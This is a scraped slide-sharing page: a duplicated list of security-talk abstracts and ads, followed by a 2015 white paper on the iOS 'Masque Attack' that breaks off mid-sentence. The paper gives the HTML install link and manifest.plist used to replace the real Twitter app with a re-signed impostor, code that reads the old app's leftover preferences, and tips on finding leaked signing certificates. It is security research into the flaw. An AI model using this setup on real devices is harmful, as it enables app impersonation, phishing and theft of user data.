This is a presentation I gave to senior high school students. The 1st part is an overview the 2nd part is more detailed on the ways to perform the Ethical Hacking.
Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Part of this presentation is based on research published in 2015, which was demonstrated the increasing spread of malware binaries mach-o and how to analyze the type of these binary. In this presentation, we will explain with more detail the structure of Binary using debuggers tools and reverse engineering techniques.The knowledge gained will be useful from analysis of malware as also for challenges type crackmes on CTFs.
This is a presentation I gave to senior high school students. The 1st part is an overview the 2nd part is more detailed on the ways to perform the Ethical Hacking.
Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Part of this presentation is based on research published in 2015, which was demonstrated the increasing spread of malware binaries mach-o and how to analyze the type of these binary. In this presentation, we will explain with more detail the structure of Binary using debuggers tools and reverse engineering techniques.The knowledge gained will be useful from analysis of malware as also for challenges type crackmes on CTFs.
CNIT 123: Ch 3: Network and Computer AttacksSam Bowne
Slides for a college course based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610
Teacher: Sam Bowne
Twitter: @sambowne
Website: https://samsclass.info/123/123_S18.shtml
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
Digital Signature, Electronic Signature, How digital signature works, Confidentiality of digital signature, Authenticity of digital signature, Integrity of digital signature, standard of digital signature, Algorithm of digital signature, Mathematical base of digital signature, parameters of digital signature, key computation of digital signature, key generation of digital signature, verification of of digital signature
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE20112461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE20112461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications. If you’re a breaker, you will learn a new technique and enjoy our exploits. If you’re a builder, you will learn how to mitigate this attack. In both cases, you can help us to eradicate CVE20112461. After all, Troopers is about making the world a safer place.
Mauro Gentile, Luca Carettoni
CNIT 123: Ch 3: Network and Computer AttacksSam Bowne
Slides for a college course based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610
Teacher: Sam Bowne
Twitter: @sambowne
Website: https://samsclass.info/123/123_S18.shtml
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
Digital Signature, Electronic Signature, How digital signature works, Confidentiality of digital signature, Authenticity of digital signature, Integrity of digital signature, standard of digital signature, Algorithm of digital signature, Mathematical base of digital signature, parameters of digital signature, key computation of digital signature, key generation of digital signature, verification of of digital signature
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE20112461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE20112461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications. If you’re a breaker, you will learn a new technique and enjoy our exploits. If you’re a builder, you will learn how to mitigate this attack. In both cases, you can help us to eradicate CVE20112461. After all, Troopers is about making the world a safer place.
Mauro Gentile, Luca Carettoni
El desarrollo de APIs en las empresas es muy importante hoy en día. Poder exponer estas APIs no solo de forma interna sino al exterior puede generar a las empresas un gran valor añadido. A veces las tecnologías usadas y la falta de buenas prácticas hacen que no se tomen las medidas de seguridad más adecuadas. En este documento se explica cómo enfrentarse a esta problemática en tus APIs y como GFI puede ayudarte en esta delicada labor
Talk feito no CocoaHeads RJ edição Novembro/2015 sobre Segurança no desenvolvimento de aplicativos iOS, considerando Persistência, Comunicação e Segurança do Código.
Mobile Banking Security: Challenges, SolutionsCognizant
With the proliferation of online mobile banking services, security is a key issue. We offer a primer on security challenges and applicable controls/remedies. This includes solutions such as Trusteer Mobile SDK, Arxon's EnsureIT and Dexguard.
The curious case of mobile app security.pptxAnkit Giri
A talk on the essence of Mobile app and mobile security. The agenda was as follows:
Why we need to secure the mobile apps!
What do you check when installing an app ?
Mobile app security assessment
Some interesting cases of vulnerabilities
Let’s takeover your account
My Research and reported vulnerabilities
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
Mobile Application market is growing like anything and so is the Mobile Security industry. With lots of frequent application releases and updates happening, conducting the complete security analysis of mobile applications becomes time consuming and cumbersome. In this talk I will introduce an extendable, and scalable web framework called Mobile Security Framework (https://github.com/ajinabraham/YSO-Mobile-Security-Framework) for Security analysis of Mobile Applications. Mobile Security Framework is an intelligent and automated open source mobile application (Android/iOS) pentesting and binary/code analysis framework capable of performing static and dynamic analysis. It supports Android and iOS binaries as well as zipped source code. During the presentation, I will demonstrates some of the issues identified by the tool in real world android applications. The latest Dynamic Analyzer module will be released at OWASP AppSec. Attendees Benefits * An Open Source framework for Automated Mobile Security Assessment. * One Click Report Generation and Security Assessment. * Framework can be deployed at your own environment so that you have complete control of the data. The data/report stays within the organisation and nothing is stored in the cloud. * Supports both Android and iOS Applications. * Semi Automatic Dynamic Analyzer for intelligent application logic based (whitebox) security assessment.
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
Application development has come a long way in last two decades, but it is puzzling to see that despite major security breaches, security testing takes a back seat as compared to other forms of quality testing measures such as usability or functional testing.
Remote Exploitation of the Dropbox SDK for AndroidIBM Security
The IBM X-Force Application Security Research Team has discovered a vulnerability in the Dropbox SDK for Android (CVE-2014-8889) which allows attackers to connect applications on mobile devices to a Dropbox account controlled by the attacker without the victim's knowledge or authorization. This is a serious flaw in the authentication mechanism within any Android app using a Dropbox SDK Version 1.5.4 through 1.6.1
We've got some critical patches for Microsoft and Oracle for the month of April. Also, some insights on keeping your organization's Zoom users secure. Join Ivanti experts Chris Goettl, Todd Schell and Brian Secrist for their monthly Patch Tuesday webinar.
Mobile security is one of the most important
aspect when it comes to keeping our data secure from any
external attack like phishing, data hacking and many other
attacks that can have very disastrous effects that may also
lead to social disturbance, as in one’s private data can be
made public by the attackers.
Firebase crashlytics integration in iOS swift (dSYM File Required Problem Res...InnovationM
Nowadays, Firebase Crashlytics is a very important part of our projects to monitor crashes of our applications that may be an android or iOS application. For the time being it is an unbeatable tool to log your day to day crashes for each user of your application.
Stephanie Vanroelen - Mobile Anti-Virus apps exposedNoNameCon
Talk by Stephanie Vanroelen at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/ZFJFW8/
This talk is about top anti-virus apps on Mobile. An in depth look on how they work and what they do. Do they add to or break the security of the mobile OS?
This talk is about top anti-virus apps on Android. An in-depth look at how they work and what they do.
The focus will be on the top 5 android apps:
Kaspersky Mobile Antivirus
Avast Mobile Security
Norton Security & Antivirus
Sophos Mobile Security
Security Master
This talk will try to answer the following questions: Do they add to or break the security of the Android sandbox system? What type of information is being shared back to the company (if any)? Are these apps well built?
Finally, I will address the following: Do I recommend any of these apps and if so which one and why?
Cracking app isolation on Apple devices is an intricate challenge due to the robust security measures implemented by the company. Apple employs a variety of mechanisms to ensure the isolation and integrity of applications, primarily through its sandboxing approach. Sandboxing restricts each app's access to system resources and other apps, limiting the potential damage that a compromised app could inflict on the device.
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Community App for Promoting Cross-Cultural InteractionMike Taylor
Community app for promoting cross-cultural interaction with facebook, Gtalk and multiple social networking sites integration. It includes blogging and photo sharing
Community App for Promoting Cross-Cultural InteractionMike Taylor
Community app for promoting cross-cultural interaction with facebook, Gtalk and multiple social networking sites integration. It includes blogging and photo sharing
Ieee S&P 2020 - Software Security: from Research to Industry.Minded Security
Day by day, technology introduces new changes affecting several aspects of everyone's life, from private individuals to industry.
In such ever changing world, cutting edge research on application security is one of the topics that requires attention
in order to keep up with this.
Minded Security, since the beginning of its mission, has been focusing on application security research in order to
professionally support analysis and mitigation of old and new threats for our customers.
This talk will go through some of the research performed by Minded Security improving the quality of security and privacy of our customers.
More and more enterprises are restructuring their development teams to replicate the agility and innovation of startups.
In the last few years, microservices have gained popularity for their ability to provide modularity, scalability, high availability, as well as make it easier for smaller development teams to develop in an agile way.
But how do they deal with security? what about security contexts?
This talk will give insights about the most interesting issues found in the last years while testing the security of multilayered microservices solutions and how they were fixed.
Minded Security offers a series of courses that target different skills including secure design, secure coding, secure testing and vulnerability management. Besides the software developers, the main target roles for software security training are the software architects, the business analysts, the project managers and the information security managers/officers.
The training courses being developed by Minded Security have been developed over the course of several years (since 2007) delivering software security professional services for customers.
This month we delivered a really interesting Live Hacking Demo for one of our relevant customer. We published the anonymized results and you can have a look here.
This talk introduces the new OWASP projects focusing on the new GDPR regulation and the impact on the Software Development Life Cycle for a Company today.
Minded Security was invited to have a 4 mins pitch at the CyberTech Europe 2017. In this presentation we describe the technology Blueclosure a JavaScript Security Platform for developers, auditor, testers, SOC in order to identify, detect and response to JS security flaws in the code.
BC Detect Enterprise is a product designed to automate client-side JavaScript security analysis, and to provide continuous integration with DevOps teams for testing Web client side security issues.
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security
1. 3rd Party Software: how to manage the update of 3rd party software
2. 3rd Party Development: Outsourcing
3. 3rd Party Supplier
4. 3rd Party OF THINGS
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Minded Security
Matteo Meucci did a talk on software security in practice, describing the actual scenario and the roadmap for the enterprise to improve their maturity in the SDLC.
== Abstract ==
Presented at Analysis of Security APIs
Satellite workshop of IEEE CSF
July 13th 2015, Verona, Italy
http://www.dsi.unive.it/~focardi/ASA8/#program
Browsers HTML sandbox is, by default, only protected by the "Same Origin Policy". Although this simple constraint gave companies a very flexible environment to play with, and was probably one of the key features that led the Web to success as we see it now, it is quite unsatisfactory from a security perspective. In fact, this solution does not face the problem of letting third party code access the whole data in the DOM when explicitly loaded and executed by the browser. This behaviour opens the door to malicious third party code attacks that can be achieved using either Cross Site Scripting (OWASP Top Ten Security risk #1 for many years) or second order attacks, such as malvertising software. In the past, several attempts to sandbox untrusted code have been made. In this talk we will focus on successes and failures of the most interesting open source sandboxing browser techniques.
Con PHP Object Injection ci si riferisce ad una classe di vulnerabilità che può affliggere quelle applicazioni PHP che utilizzano la funzione "unserialize" in modo insicuro. Attraverso questo genere di vulnerabilità un potenziale attaccante potrebbe essere in grado di "iniettare" uno o più oggetti all'interno dello scope dell'applicazione. Gli attributi di tali oggetti possono essere modificati arbitrariamente dall'attaccante, e ciò potrebbe causare un comportamento inaspettato del flusso di esecuzione dell'applicazione, che potrebbe consentire all'attaccante di eseguire diverse tipologie di attacchi, o nei casi più gravi di eseguire codice PHP arbitrario.
E-commerce Application Development Company.pdfHornet Dynamics
Your business can reach new heights with our assistance as we design solutions that are specifically appropriate for your goals and vision. Our eCommerce application solutions can digitally coordinate all retail operations processes to meet the demands of the marketplace while maintaining business continuity.
Why Mobile App Regression Testing is Critical for Sustained Success_ A Detail...kalichargn70th171
A dynamic process unfolds in the intricate realm of software development, dedicated to crafting and sustaining products that effortlessly address user needs. Amidst vital stages like market analysis and requirement assessments, the heart of software development lies in the meticulous creation and upkeep of source code. Code alterations are inherent, challenging code quality, particularly under stringent deadlines.
Software Engineering, Software Consulting, Tech Lead, Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Transaction, Spring MVC, OpenShift Cloud Platform, Kafka, REST, SOAP, LLD & HLD.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
Code reviews are vital for ensuring good code quality. They serve as one of our last lines of defense against bugs and subpar code reaching production.
Yet, they often turn into annoying tasks riddled with frustration, hostility, unclear feedback and lack of standards. How can we improve this crucial process?
In this session we will cover:
- The Art of Effective Code Reviews
- Streamlining the Review Process
- Elevating Reviews with Automated Tools
By the end of this presentation, you'll have the knowledge on how to organize and improve your code review proces
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxrickgrimesss22
Discover the essential features to incorporate in your Winzo clone app to boost business growth, enhance user engagement, and drive revenue. Learn how to create a compelling gaming experience that stands out in the competitive market.
Zoom is a comprehensive platform designed to connect individuals and teams efficiently. With its user-friendly interface and powerful features, Zoom has become a go-to solution for virtual communication and collaboration. It offers a range of tools, including virtual meetings, team chat, VoIP phone systems, online whiteboards, and AI companions, to streamline workflows and enhance productivity.
Mobile App Development Company In Noida | Drona InfotechDrona Infotech
Looking for a reliable mobile app development company in Noida? Look no further than Drona Infotech. We specialize in creating customized apps for your business needs.
Visit Us For : https://www.dronainfotech.com/mobile-application-development/
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeAftab Hussain
Understanding variable roles in code has been found to be helpful by students
in learning programming -- could variable roles help deep neural models in
performing coding tasks? We do an exploratory study.
- These are slides of the talk given at InteNSE'23: The 1st International Workshop on Interpretability and Robustness in Neural Software Engineering, co-located with the 45th International Conference on Software Engineering, ICSE 2023, Melbourne Australia
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
OpenMetadata Community Meeting - 5th June 2024OpenMetadata
The OpenMetadata Community Meeting was held on June 5th, 2024. In this meeting, we discussed about the data quality capabilities that are integrated with the Incident Manager, providing a complete solution to handle your data observability needs. Watch the end-to-end demo of the data quality features.
* How to run your own data quality framework
* What is the performance impact of running data quality frameworks
* How to run the test cases in your own ETL pipelines
* How the Incident Manager is integrated
* Get notified with alerts when test cases fail
Watch the meeting recording here - https://www.youtube.com/watch?v=UbNOje0kf6E
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Launch Your Streaming Platforms in MinutesRoshan Dwivedi
The claim of launching a streaming platform in minutes might be a bit of an exaggeration, but there are services that can significantly streamline the process. Here's a breakdown:
Pros of Speedy Streaming Platform Launch Services:
No coding required: These services often use drag-and-drop interfaces or pre-built templates, eliminating the need for programming knowledge.
Faster setup: Compared to building from scratch, these platforms can get you up and running much quicker.
All-in-one solutions: Many services offer features like content management systems (CMS), video players, and monetization tools, reducing the need for multiple integrations.
Things to Consider:
Limited customization: These platforms may offer less flexibility in design and functionality compared to custom-built solutions.
Scalability: As your audience grows, you might need to upgrade to a more robust platform or encounter limitations with the "quick launch" option.
Features: Carefully evaluate which features are included and if they meet your specific needs (e.g., live streaming, subscription options).
Examples of Services for Launching Streaming Platforms:
Muvi [muvi com]
Uscreen [usencreen tv]
Alternatives to Consider:
Existing Streaming platforms: Platforms like YouTube or Twitch might be suitable for basic streaming needs, though monetization options might be limited.
Custom Development: While more time-consuming, custom development offers the most control and flexibility for your platform.
Overall, launching a streaming platform in minutes might not be entirely realistic, but these services can significantly speed up the process compared to building from scratch. Carefully consider your needs and budget when choosing the best option for you.
Need for Speed: Removing speed bumps from your Symfony projects ⚡️Łukasz Chruściel
No one wants their application to drag like a car stuck in the slow lane! Yet it’s all too common to encounter bumpy, pothole-filled solutions that slow the speed of any application. Symfony apps are not an exception.
In this talk, I will take you for a spin around the performance racetrack. We’ll explore common pitfalls - those hidden potholes on your application that can cause unexpected slowdowns. Learn how to spot these performance bumps early, and more importantly, how to navigate around them to keep your application running at top speed.
We will focus in particular on tuning your engine at the application level, making the right adjustments to ensure that your system responds like a well-oiled, high-performance race car.
1. Project: White Paper – Masque Attack
Authors: Giorgio Fedon, Simone Bovi
Edition: 1.0
Date: 03-03-2015
White Paper:
Masque Attack
2. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 1
Table of contents
1 INTRODUCTION..........................................................................................2
1.1 White Paper Objectives......................................................................................2
1.2 Masque Attack Introduction...............................................................................2
1.2.1 Threat scenarios of the Masque Attack.................................................................4
2 ATTACK EXECUTIONS AND RESULTS OF THE ANALYSIS...................5
2.1 Environment Setup.............................................................................................5
2.2 Attack execution ................................................................................................6
2.3 Results: Files accessible by the new app.................................................10
2.3.1 Preferences File ...................................................................................................10
2.3.2 Keychain access ...................................................................................................11
2.3.3 Access to the bundle’s files..................................................................................12
2.3.4 Access to the files in the sandbox........................................................................13
2.4 Masque Attack via URL Schemes..............................................................15
3 REMEDIATION ..........................................................................................17
3. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 2
1 Introduction
1.1 White Paper Objectives
The objectives of this white paper are to analyze the impacts and mitigations of the
Masque Attack against a non jailbroken iOS Apple device.
This paper is provided with a first introductive section that has the purpose to generally
illustrate this kind of attack and to explore all its implications.
The second section deals with the setup used to perpetrate the attack and the set of the
tests executed to verify which files belonging to the attacked application were accessible
by the new one.
The third and last section show the conclusions of the paper, the key results obtained
and a list of possible remediation.
1.2 Masque Attack Introduction
In July 2014, FireEye Security Company with the security researchers Stefan Esser and
Jonathan Zdziarski discovered1 that an iOS app installed using enterprise/ad-hoc
provisioning could replace another genuine app previously installed through the App
Store, as long as both apps used the same bundle identifier.
This vulnerability exists because iOS doesn't enforce matching certificates for apps with
the same bundle identifier.
The malicious app could be downloaded and installed by a user via social engineering
attacks: once done that, the new app overwrites the old one already installed on the
device.
An exception is represented by the iOS preinstalled apps: they can’t be substituted.
It is important to note that this attack poses iOS users at a greater risk than the Android
counterpart. In fact on Android exists an option that disallow users to install application
from sources different from the Play Store, while on iOS this choice is not available.
The following picture shows the Masque Attack flow:
1 https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-
to-us.html
4. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 3
Besides the application personification effect, the malicious app will be able to steal all
data saved in the directories shared with the original app (i.e. Local Data Cache,
Preferences file, etc.).
On the other hand, Keychain entries and pre-attack bundle’s file seem to remain safely
protected from unauthorized read.
More analysis on that will be provided in the section 2 of this paper.
5. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 4
Furthermore, it has been found that the trust alert prompted at the first launch of an
enterprise-signed app can be easily bypassed exploiting the present URL Schemes
implementation.
iOS version 7.x and 8.x (< 8.1.3) are affected by this issue on both jailbroken and non
jailbroken devices.
Furthermore, the Masque Attack via URL Scheme Hijacking vulnerability has not yet
been fixed. This will be explained in detail in section 2.4.
1.2.1 Threat scenarios of the Masque Attack
These are the main threat scenarios of this kind of attack:
Non jailbroken iOS Apple devices are threatened too;
A user may not be conscious of having a malicious app on his device because it replaces
one that is regularly installed;
The malicious app can read all the unencrypted data stored by the previous app, but the
Keychain, and send them to their servers;
The malicious app can mount a phishing attack mimicking the original UI app and it can
steal the related credentials;
The malicious app can be launched although the presence of an alert prompt when
launching enterprise-signed apps for the first time;
The malicious app can hijack the URL Schemes of a legitimate popular app in order to
perform phishing attacks to steal credentials or gather data intended to be shared
between two trusted apps.
6. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 5
2 Attack Executions and Results of the Analysis
2.1 Environment Setup
An enterprise provisioning profile matched with a developer certificate were used to
perpetrate the attack: the public key inside the first file is related to the private key of
the certificate installed on the host where the compilation of the app is performed.
The app is installed on the device via OTA, using a local HTTPS web server.
It has to be noticed the fact that developer certificates and mobile enterprise
provisioning files can be easily found on Internet through ad-hoc Google dorks.
Following a screenshot of a website where these files can be located:
For the signing part of the created IPA, the iReSign tool was used
(https://github.com/maciekish/iReSign):
As we can see, the IPA can be signed with a smuggled developer certificate.
7. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 6
2.2 Attack execution
The app used as an example for the attack is Twitter, downloadable from the App Store
at the time of writing.
Bundle Identifier of the app Twitter: com.atebits.Tweetie2.
Following a picture related to the pre-attack test device Springboard is shown:
As it is possible to see, the Twitter app downloaded from the App Store results to be
regularly installed.
Connecting to the URL where the web server used for the OTA installation is placed, it is
possible to see the following screen:
8. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 7
This was created using the following HTML code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sample iOS OTA install</title>
</head>
<body>
<a href="itms-services://?action=download-
manifest&url=https://www.mindedsecurity.com/manifest.plist"><font size="+4">Install the
App</font></a>
</body>
</html>
Clicking on “Install the App”, iOS accesses the manifest.plist file loaded on the web
server and with the following contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
9. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 8
<dict>
<key>items</key>
<array>
<dict>
<key>assets</key>
<array>
<dict>
<key>kind</key>
<string>software-package</string>
<key>url</key>
<string>https://www.mindedsecurity.com/twitter.ipa</string>
</dict>
</array>
<key>metadata</key>
<dict>
<key>bundle-identifier</key>
<string>com.atebits.Tweetie2</string>
<key>bundle-version</key>
<string>1.0</string>
<key>kind</key>
<string>software</string>
<key>title</key>
<string>Twitter</string>
</dict>
</dict>
</array>
</dict>
</plist>
Then iOS asks to confirm the download. This application has the name equals to the
value of the key “title” inside the manifest.plist:
10. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 9
Clicking on “Install”, the app’s installation is initialized on the device as shown by the
following screenshots:
11. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 10
The application presents a different Display Name and default icon in order to make the
substitution clear, but it is possible to use the original icon and name used by the real
Twitter application.
2.3 Results: Files accessible by the new app
At this point it is very interesting to verify what files are accessible by the new
application.
Clearly, the new application is not able to access files outside its sandbox but it could be
able to access other files left by the previous installation.
Below all the tests performed will be listed and the used code and related log output will
be provided.
2.3.1 Preferences File
Each application saves its settings inside a file in the sandbox at the Library/Preferences
path. This file is automatically created at the application’s first launch.
The following code was used to verify if the new app can access the preferences file
created by the previous application:
NSUserDefaults *prefs = [NSUserDefaults standardUserDefaults];
NSString *value1 = [prefs stringForKey:@"TCCardRuntimePlatform"];
NSLog(@"Value of the key TCCardRuntimePlatform in the Preferences file: %@", value1);
12. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 11
NSString *value2 = [prefs stringForKey:@"appVersion"];
NSLog(@"Value of the key appVersion in the Preferences file: %@", value2);
NSString *value3 = [prefs stringForKey:@"previousApplicationVersion"];
NSLog(@"Value of the key previousApplicationVersion in the Preferences file: %@", value3);
From the application log it is possible to see that all the value are correctly read:
Twitter[1708] <Warning>: Value of the key TCCardRuntimePlatform in Preferences file:
iPhone-12
Twitter[1708] <Warning>: Value of the key appVersion in Preferences file: 6.21.1
Twitter[1708] <Warning>: Value of the key previousApplicationVersion in Preferences file:
6.21.1
So, the Preferences file created by the substituted application results to be perfectly
readable by the new application.
2.3.2 Keychain access
Keychain is a ciphered SQLite database where it is advisable to store sensitive
application data such as passwords.
By default the sandbox on iOS is also enforced for the Keychain: an app can access only
its own Keychain entries.
The following code was used to verify if the new app can access the Keychain entries of
the previous application (PDKeychainBindingsController library available at
https://github.com/carlbrown/PDKeychainBindingsController):
NSLog(@"Trying to read the Keychain");
PDKeychainBindings *bindings = [PDKeychainBindings sharedKeychainBindings];
NSString * value = [bindings stringForKey:@"passwordString"];
NSLog(@"%@", value);
From the application log it is possible to see that trying to read an arbitrary Keychain
entry throws the following error:
Twitter[1708] <Warning>: Trying to read the Keychain
securityd[1245] <Error>: securityd_xpc_dictionary_handler Twitter[1708] copy_matching The
operation couldn’t be completed. (OSStatus error -34018 - client has neither application-
identifier nor keychain-access-groups entitlements)
Twitter[1708] <Error>: SecOSStatusWith error:[-34018] The operation couldn’t be
completed. (OSStatus error -34018 - Remote error : The operation couldn’t be completed.
(OSStatus error -34018 - client has neither application-identifier nor keychain-access-
groups entitlements))
13. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 12
Twitter[1708] <Warning>: (null)
The reason behind the error lies in the mechanism with which single Keychain entries
can be accessed from different applications.
For the purpose of sharing Keychain entries, Apple provides the Keychain Access Group:
each app that belongs to a group can read all the Keychain entries associated with that
group. The apps that do not belong to it are forbidden from accessing them.
The access control to shared items is enforced through App ID prefixes (Team ID) and
provisioning profiles. It is not possible to access a Keychain Access Group without using a
provisioning profile containing the AppID prefix of the app of which it is desirable to
access the Keychain. However Apple does not allow a developer to use an AppID equal
to another.
So the only way to access the Keychain entries of the old application lies in the
generation of a provisioning file with an AppID containing the same prefix used by the
previous application. This is impossible in general but Erik Romjin, on October 2014,
found a vulnerability in the Apple portal that allows a developer to insert an arbitrary
value as the AppID, permitting him to read Keychain entries of the app with the same
prefix. The vulnerability is now fixed but it can’t be excluded that fake provisioning
profiles will still be used until October 2015. This is because they expire after one year
from the creation.
Several information about this vulnerability can be found at this link:
